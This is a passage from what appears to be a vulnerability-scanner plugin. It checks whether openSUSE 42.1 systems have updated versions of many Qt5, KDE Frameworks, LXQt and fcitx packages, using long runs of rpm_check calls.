reference:\"libQt5Network-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Network5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Network5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Nfc5-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Nfc5-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Nfc5-imports-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Nfc5-imports-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5OpenGL-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5OpenGL-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5OpenGL5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5OpenGL5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5OpenGLExtensions-devel-static-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PlatformHeaders-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PlatformSupport-devel-static-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PlatformSupport-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Positioning5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Positioning5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PrintSupport-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PrintSupport-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PrintSupport5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5PrintSupport5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Script5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Script5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sensors5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sensors5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sensors5-imports-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sensors5-imports-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5SerialPort5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5SerialPort5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-mysql-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-mysql-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-postgresql-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-postgresql-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-sqlite-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-sqlite-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-unixODBC-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Sql5-unixODBC-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Svg5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Svg5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Test-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Test-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Test5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Test5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WaylandClient5-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WaylandClient5-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebChannel5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebChannel5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebChannel5-imports-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebChannel5-imports-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKit-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKit5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKit5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKit5-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKit5-imports-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKit5-imports-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKitWidgets-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKitWidgets-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKitWidgets5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebKitWidgets5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebSockets5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebSockets5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebSockets5-imports-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5WebSockets5-imports-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Widgets-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Widgets-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Widgets5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Widgets5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5X11Extras5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5X11Extras5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Xml-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Xml5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Xml5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5XmlPatterns5-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5XmlPatterns5-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQtQuick5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQtQuick5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-creator-3.5.1-6.6\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-creator-debuginfo-3.5.1-6.6\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-creator-debugsource-3.5.1-6.6\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-linguist-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-linguist-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-linguist-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-debugsource-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-examples-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-examples-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-imports-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-imports-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qt3d-private-headers-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-common-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-common-devel-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-debugsource-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-doc-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-examples-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-examples-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-platformtheme-gtk2-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-platformtheme-gtk2-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtbase-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-debugsource-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-devel-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-examples-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-examples-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-private-headers-devel-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-tools-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtconnectivity-tools-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtct-0.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtct-debuginfo-0.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtct-debugsource-0.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-debugsource-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-devel-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-examples-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-examples-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-tools-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdeclarative-tools-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtdoc-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtgraphicaleffects-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtimageformats-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtimageformats-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtimageformats-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtimageformats-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtlocation-debugsource-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtlocation-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtlocation-examples-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtlocation-examples-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtlocation-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtmultimedia-debugsource-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtmultimedia-devel-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtmultimedia-examples-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtmultimedia-examples-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtmultimedia-private-headers-devel-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquick1-debugsource-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquick1-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquick1-devel-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquick1-examples-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquick1-examples-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquick1-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquickcontrols-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquickcontrols-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquickcontrols-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquickcontrols-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtquickcontrols-examples-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtscript-debugsource-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtscript-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtscript-examples-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtscript-examples-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtscript-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsensors-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsensors-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsensors-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsensors-examples-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsensors-private-headers-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtserialport-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtserialport-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtserialport-private-headers-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsvg-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsvg-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsvg-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsvg-examples-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtsvg-private-headers-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-debugsource-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-examples-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-examples-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttools-private-headers-devel-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qttranslations-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-debugsource-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-devel-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-examples-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-examples-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwayland-private-headers-devel-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebchannel-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebchannel-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebchannel-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebchannel-private-headers-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-debuginfo-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-debugsource-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-devel-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-examples-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-examples-debuginfo-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebengine-private-headers-devel-5.5.1-4.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebkit-debugsource-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebkit-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebkit-examples-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebkit-examples-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebsockets-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebsockets-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebsockets-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtwebsockets-private-headers-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtx11extras-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtx11extras-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtxmlpatterns-debugsource-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtxmlpatterns-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtxmlpatterns-examples-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtxmlpatterns-examples-debuginfo-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libqt5-qtxmlpatterns-private-headers-devel-5.5.1-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-powermanagement-0.9.0-4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-powermanagement-debuginfo-0.9.0-4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-powermanagement-debugsource-0.9.0-4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-powermanagement-lang-0.9.0-4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-qtplugin-0.9.0-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-qtplugin-debuginfo-0.9.0-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"lxqt-qtplugin-debugsource-0.9.0-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"fcitx-qt5-32bit-1.0.4-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"fcitx-qt5-debuginfo-32bit-1.0.4-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"frameworkintegration-devel-32bit-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"frameworkintegration-plugin-32bit-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"frameworkintegration-plugin-debuginfo-32bit-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kwayland-32bit-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kwayland-debuginfo-32bit-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kwayland-devel-32bit-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libKF5Style5-32bit-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libKF5Style5-debuginfo-32bit-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DCollision5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DCollision5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DCore5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DCore5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DInput5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DInput5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DLogic5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DLogic5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DQuick5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DQuick5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DQuickRenderer5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DQuickRenderer5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DRenderer5-32bit-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libQt53DRenderer5-debuginfo-32bit-5.5.1-2.1\") ) flag++;\nif ( 